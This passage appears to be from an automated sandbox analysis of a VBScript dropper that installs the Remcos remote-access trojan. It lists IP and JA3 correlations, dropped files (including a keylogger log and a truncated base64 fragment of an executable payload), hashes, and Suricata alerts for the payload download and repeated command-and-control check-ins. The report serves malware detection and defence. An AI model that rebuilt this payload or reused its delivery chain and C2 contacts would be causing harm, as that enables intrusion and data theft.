                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              • 172.64.41.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                              • 172.64.41.3
                                                                                              COLOMBIATELECOMUNICACIONESSAESPCOjew.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 190.254.50.103
                                                                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 186.113.206.88
                                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 186.102.99.255
                                                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                              • 152.205.247.76
                                                                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 190.254.50.177
                                                                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                              • 152.201.221.190
                                                                                              nabmips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 152.203.19.145
                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 152.204.126.56
                                                                                              1730033107cd1f685dd343fb5289f0989ab1767df23f3b365f9ae4183bbc963b1c7d6b27ef552.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 186.169.46.48
                                                                                              173003311009f4856d26633f5ec14546c9f54fd0a35c3ef95426fb756d9dfebe737a4ee690830.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                              • 186.169.46.48
                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
                                                                                              A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 104.21.74.191
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                              • 188.114.96.3
                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              • 172.64.41.3
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                              • 172.64.41.3
                                                                                              OVHFRfile.exeGet hashmaliciousXmrigBrowse
                                                                                              • 51.79.145.202
                                                                                              https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                                              • 51.75.86.98
                                                                                              http://199.59.243.227Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 51.75.86.98
                                                                                              https://gthr.uk/e8c3Get hashmaliciousUnknownBrowse
                                                                                              • 51.89.232.103
                                                                                              20241029_163818.jpgGet hashmaliciousUnknownBrowse
                                                                                              • 51.89.232.103
                                                                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                              • 144.217.222.207
                                                                                              jew.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                              • 37.59.96.120
                                                                                              ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 51.81.194.202
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                              • 147.135.36.89
                                                                                              https://hianime.toGet hashmaliciousUnknownBrowse
                                                                                              • 54.38.113.3

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0enOrden_de_Compra___0001245.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              CPYEzG7VGh.exeGet hashmaliciousDCRatBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3
                                                                                              http://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.3.235
                                                                                              • 164.132.58.105
                                                                                              • 188.114.97.3

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\remcos\logs.dat

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):144
                                                                                              Entropy (8bit):3.3378527165164744
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:rhlKlM+WlUlRlM6cl5JWRal2Jl+7R0DAlBG45klovDl6v:6lw2U5YcIeeDAlOWAv
                                                                                              MD5:89DC9D2B4303A079557D9F80BC2F3D8C
                                                                                              SHA1:8D300391D0496527067B748335A5D4029BC5D977
                                                                                              SHA-256:279D73E7BAE3B6C3B7E70694969AC96CDA99C82FCE74A79EFCAF7F6732B67EB6
                                                                                              SHA-512:860BF6186D77E34B0A2D0D4398BC488AA092E92BE943479C871E6CC8BC057844E497929730E536ABAD59F5F3F2A66D472343B1C6C37CD01951503DB8B9406819
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Preview:....[.2.0.2.4./.1.0./.3.1. .0.2.:.4.1.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):11608
                                                                                              Entropy (8bit):4.890472898059848
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.1940658735648508
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlllulp77th:NllU
                                                                                              MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                              SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                              SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                              SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                              Malicious:false
                                                                                              Preview:@...e.................................x..............@..........

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iejrq5or.0gb.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_led4k1bt.bdd.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouoftpk4.jyi.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz50m0am.a4n.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvv3jrxo.ax3.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\dll01.txt

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):82604
                                                                                              Entropy (8bit):4.933268783138117
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:yxkG9DytusrHiJZM2FeBZ0YNIIIlNsDf50jguaPCcl7wh6V8xPOr:M59Dpeir8ZRNIItzu4z7s+Br
                                                                                              MD5:E177873E2D842F08553C449F4758A4CE
                                                                                              SHA1:91612A3524924E253495CBF1DD05AEFDFB118FFC
                                                                                              SHA-256:970E00FFC2819C1F2D6FBE0C13E115B101F28108813B04ACFEE162043648E0EA
                                                                                              SHA-512:2F38AC3FD5C68297DEA3538C74E327850F6CEC6C28326DA34FCD4AE7FCDD6D26DFE337498C5D44438006A231CDBA86DBB605F2CE3F8A66142600E50F13B447FC
                                                                                              Malicious:false
                                                                                              Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPyfIWcAAAAAAAAAAOAAIiALAVAAAOoAAAAGAAAAAAAATgkBAAAgAAAAAAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPgIAQBTAAAAACABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVOkAAAAgAAAA6gAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAIAEAAAQAAADsAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAEABAAACAAAA8AAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwCQEAAAAAAEgAAAACAAUATKcAAKxhAAABAAAAAAAAAHSaAADYDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqJgACKAQAAAoAKgAAEzAEACwAAAABAAARIAU3UAAoBgAACm8HAAAK0AQAAAIoCAAACm8JAAAKKAoAAAoUFCjpAAAGJioTMAQAMAAAAAEAABEgyjRQACgGAAAKbwcAAArQBAAAAigIAAAKbwkAAAooCgAAChQUKOkAAAZ0AwAAAioTMAQAMAAAAAEAABEgsDRQACgGAAAK

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
                                                                                              Entropy (8bit):3.5702788509354697
                                                                                              TrID:
                                                                                              • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                              • MP3 audio (1001/1) 33.33%
                                                                                              File name:asegurar.vbs
                                                                                              File size:15'016'182 bytes
                                                                                              MD5:aee210142f6411df0f3c0469d2a9df27
                                                                                              SHA1:991b0e994e4da9f76bf9fd03bc3fef75dfd94590
                                                                                              SHA256:3a07acb9e24dace059cea1a5c9c90f457e3c0d3e823805ae2fd0241d75917fc2
                                                                                              SHA512:5199ec7836d07bfe4c48deb3d16993f45ffc9864c404330462f9698960f7a5272bc5a7fff56f4a0d9afa9df2c01271cd0b303004f874797e20ec997c3f55fae3
                                                                                              SSDEEP:1536:lyyyyyyyyyyyyyyyyyyyyyyyryyyyyyyyyyyyyyyyyyyyyyycyyyyyyyyyyyyyyz:TZ5U
                                                                                              TLSH:A1E60113A759EF30DF56387370D37B975261E3BA199C489C60E8822828C59A347D1BFE
                                                                                              File Content Preview:..........'. .4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4..".0..@... ...@...@...4

                                                                                              File Icon

                                                                                              Icon Hash:68d69b8f86ab9a86

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-10-31T07:41:19.134483+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449736188.114.97.3443TCP
                                                                                              2024-10-31T07:41:19.521177+01002020423ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound1188.114.97.3443192.168.2.449736TCP
                                                                                              2024-10-31T07:41:19.521177+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21188.114.97.3443192.168.2.449736TCP
                                                                                              2024-10-31T07:41:21.752336+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1188.114.97.3443192.168.2.449736TCP
                                                                                              2024-10-31T07:41:22.031540+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449741181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:23.610045+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449742181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:25.190506+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449743181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:26.756293+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449744181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:28.312938+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449745181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:29.875749+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449746181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:31.453622+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449747181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:33.953405+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449748181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:35.531715+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449749181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:37.109960+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449750181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:38.675448+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449751181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:40.234871+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449752181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:41.817111+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449753181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:43.391319+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449754181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:44.969400+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449755181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:46.532179+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449756181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:48.095206+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449757181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:49.656958+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449758181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:51.220517+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449759181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:52.815631+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449760181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:54.375581+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449761181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:55.937978+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449762181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:57.672426+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449764181.236.112.1692001TCP
                                                                                              2024-10-31T07:41:59.250597+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449766181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:00.815279+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449777181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:02.376348+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449783181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:03.938417+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449794181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:05.500475+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449805181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:07.079178+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449816181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:08.657245+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449824181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:10.238744+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449833181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:11.813179+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449844181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:13.377766+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449853181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:14.938356+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449861181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:16.438779+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449872181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:17.918640+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449881181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:19.344349+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449889181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:20.766372+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449899181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:22.244555+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449910181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:23.625678+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449917181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:24.962289+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449923181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:26.266463+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449934181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:27.570771+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449940181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:28.844251+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449951181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:30.076346+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449957181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:31.297618+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449965181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:32.485126+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449974181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:33.657910+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449980181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:34.813151+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449989181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:35.954553+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449997181.236.112.1692001TCP
                                                                                              2024-10-31T07:42:37.063222+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450003181.236.112.1692001TCP
